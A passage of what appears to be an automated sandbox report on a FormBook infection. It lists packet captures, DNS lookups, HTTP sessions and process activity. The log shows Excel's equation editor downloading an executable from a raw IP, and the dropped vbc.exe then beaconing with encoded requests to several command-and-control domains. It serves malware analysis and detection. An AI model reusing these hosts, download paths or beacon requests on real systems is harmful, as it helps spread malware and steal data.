                                  Jun 10, 2021 15:24:51.886744022 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886746883 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886759996 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886759996 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886775017 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886780024 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886791945 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886797905 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886806965 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886814117 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886830091 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886831999 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886846066 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886846066 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886862040 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886873960 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.917716980 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061608076 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061635971 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061655045 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061671019 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061690092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061707973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061723948 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061741114 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061753988 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061752081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061774015 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061786890 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061790943 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061794043 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061795950 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061810970 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061816931 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061830044 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061835051 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061847925 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061851978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061863899 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061872959 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061882973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061891079 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061901093 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061908960 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061922073 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061923981 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061940908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061944962 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061958075 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061963081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061975956 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061990023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061995983 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061995983 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062007904 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062021017 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062032938 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062035084 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062046051 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062053919 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062063932 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062079906 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062082052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062093019 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062100887 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062109947 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062122107 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062124014 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062140942 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062148094 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062158108 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062166929 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062175035 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062184095 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062192917 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062201977 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062211037 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062221050 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062227964 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062237978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062247038 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062262058 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062268019 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062273026 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062287092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062295914 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062304974 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062314987 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062323093 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062330961 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062340975 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077080011 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077100039 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077110052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077122927 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077137947 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077146053 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077166080 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077167034 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077182055 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077200890 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077208996 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077219963 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077234030 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077238083 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077255011 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077255011 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077271938 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077276945 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077294111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077301979 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077316999 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077332973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077332973 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077352047 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077353001 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077369928 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077387094 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077398062 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077405930 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077416897 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077430964 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077440023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077446938 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077462912 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077462912 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077478886 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077483892 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077500105 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077508926 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077517033 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077532053 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077533007 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077550888 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077553988 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077567101 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077574968 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077589035 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077600002 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077608109 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077624083 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077624083 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077645063 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077647924 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077662945 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077671051 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077680111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077692986 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077696085 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077713013 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077716112 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077729940 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077737093 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077742100 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077758074 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077761889 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077774048 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077785015 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077790022 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077805996 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077807903 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077821970 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077830076 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077837944 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077850103 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077857018 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077871084 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077874899 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077891111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077892065 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077907085 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077922106 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077924967 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077938080 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077943087 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077951908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077967882 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077997923 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.079036951 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.917033911 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:26:08.676799059 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.719157934 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:08.719304085 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.719491959 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.761806011 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:08.786259890 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:08.786566019 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.786638975 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:08.786689043 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.828906059 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:14.381091118 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:14.692454100 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:14.692559004 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:14.692687035 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:15.011657000 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:15.013705969 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:15.013732910 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:15.013942003 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:15.013993979 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:15.349241018 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:27.560842037 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.602737904 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.604615927 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.605036020 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.646814108 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.789880037 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.789932966 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.790205956 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.790329933 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.818063974 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.818197966 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.833020926 CEST804916899.83.154.118192.168.2.22

                                  UDP Packets

                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Jun 10, 2021 15:26:08.598660946 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                  Jun 10, 2021 15:26:08.666162014 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                  Jun 10, 2021 15:26:13.789688110 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                  Jun 10, 2021 15:26:14.379901886 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                                  Jun 10, 2021 15:26:20.068352938 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                                  Jun 10, 2021 15:26:20.135004997 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                                  Jun 10, 2021 15:26:27.473023891 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                                  Jun 10, 2021 15:26:27.559887886 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                                  Jun 10, 2021 15:26:32.791817904 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                                  Jun 10, 2021 15:26:32.873641968 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22

                                  DNS Queries

                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                  Jun 10, 2021 15:26:08.598660946 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.myfavbutik.com | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:13.789688110 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.69-1hn7uc.net | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:20.068352938 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.tricqr.com | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:27.473023891 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.defenestration.world | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:32.791817904 CEST | 192.168.2.22 | 8.8.8.8 | 0x6ec7 | Standard query (0) | www.buylocalclub.info | A (IP address) | IN (0x0001)

                                  DNS Answers

                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                  Jun 10, 2021 15:26:08.666162014 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.myfavbutik.com |  | 172.67.161.4 | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:08.666162014 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.myfavbutik.com |  | 104.21.15.16 | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:14.379901886 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.69-1hn7uc.net |  | 163.43.122.104 | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:20.135004997 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | Name error (3) | www.tricqr.com | none | none | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:27.559887886 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | www.defenestration.world |  | 99.83.154.118 | A (IP address) | IN (0x0001)
                                  Jun 10, 2021 15:26:32.873641968 CEST | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | Name error (3) | www.buylocalclub.info | none | none | A (IP address) | IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • 18.140.1.169
                                  • www.myfavbutik.com
                                  • www.69-1hn7uc.net
                                  • www.defenestration.world

                                  HTTP Packets

                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  0 | 192.168.2.22 | 49165 | 18.140.1.169 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  Timestamp | kBytes transferred | Direction | Data
                                  Jun 10, 2021 15:24:50.574428082 CEST | 0 | OUT | GET /ggs/doc.exe HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: 18.140.1.169
                                  Connection: Keep-Alive
                                  Jun 10, 2021 15:24:50.760368109 CEST | 1 | IN | HTTP/1.1 200 OK
                                  Date: Thu, 10 Jun 2021 13:24:50 GMT
                                  Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                  Last-Modified: Thu, 10 Jun 2021 09:42:41 GMT
                                  ETag: "f2a00-5c4663658bc88"
                                  Accept-Ranges: bytes
                                  Content-Length: 993792
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdownload


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  1 | 192.168.2.22 | 49166 | 172.67.161.4 | 80 | C:\Windows\explorer.exe
                                  Timestamp | kBytes transferred | Direction | Data
                                  Jun 10, 2021 15:26:08.719491959 CEST | 1049 | OUT | GET /p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1
                                  Host: www.myfavbutik.com
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Jun 10, 2021 15:26:08.786259890 CEST | 1049 | IN | HTTP/1.1 301 Moved Permanently
                                  Date: Thu, 10 Jun 2021 13:26:08 GMT
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 10 Jun 2021 14:26:08 GMT
                                  Location: https://www.doibutik.com/
                                  cf-request-id: 0a97b3147400002c26721e3000000001
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=WHL10s8h5lxUBs6r3PTMAs9RyAthKjHb5DfYToZHsaU6Txx9e6MhsdCQC7L3a3YgpjnC4ITL1%2FotlYU5J9IZHO%2FJho7KJY7IzofrZctNyRrcnTKrLlRWypudSjsKAtXd"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 65d2ee00bf712c26-FRA
                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  2 | 192.168.2.22 | 49167 | 163.43.122.104 | 80 | C:\Windows\explorer.exe
                                  Timestamp | kBytes transferred | Direction | Data
                                  Jun 10, 2021 15:26:14.692687035 CEST | 1050 | OUT | GET /p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1
                                  Host: www.69-1hn7uc.net
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Jun 10, 2021 15:26:15.013705969 CEST | 1051 | IN | HTTP/1.1 302 Found
                                  Date: Thu, 10 Jun 2021 13:26:13 GMT
                                  Server: Apache/2.2.13 (Unix)
                                  Location: http://www.69-1hn7uc.net/notfound?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4
                                  Content-Length: 319
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.69-1hn7uc.net/notfound?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&amp;1bPx7=ifrhEpc0Hv8pf4">here</a>.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  3 | 192.168.2.22 | 49168 | 99.83.154.118 | 80 | C:\Windows\explorer.exe
                                  Timestamp | kBytes transferred | Direction | Data
                                  Jun 10, 2021 15:26:27.605036020 CEST | 1052 | OUT | GET /p2io/?9rx=lrOqxb+UJCh0p+XgaZ1tkMjkgx31NOkXgmck/5zOeb61pSaxp+mpU6ffv/qKl6HzQ2hiJA==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1
                                  Host: www.defenestration.world
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Jun 10, 2021 15:26:27.789880037 CEST1052INHTTP/1.1 403 Forbidden
                                  Date: Thu, 10 Jun 2021 13:26:27 GMT
                                  Content-Type: text/html
                                  Content-Length: 146
                                  Connection: close
                                  Server: nginx
                                  Vary: Accept-Encoding
                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Memory Usage

                                  High Level Behavior Distribution

                                  Behavior

                                  System Behavior

                                  General

                                  Start time:15:23:49
                                  Start date:10/06/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                  Imagebase:0x13f380000
                                  File size:27641504 bytes
                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:15:24:12
                                  Start date:10/06/2021
                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                  Imagebase:0x400000
                                  File size:543304 bytes
                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:15:24:14
                                  Start date:10/06/2021
                                  Path:C:\Users\Public\vbc.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\Public\vbc.exe'
                                  Imagebase:0x1000000
                                  File size:993792 bytes
                                  MD5 hash:15D907E7D9F8286E5053796C9D78FCEC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
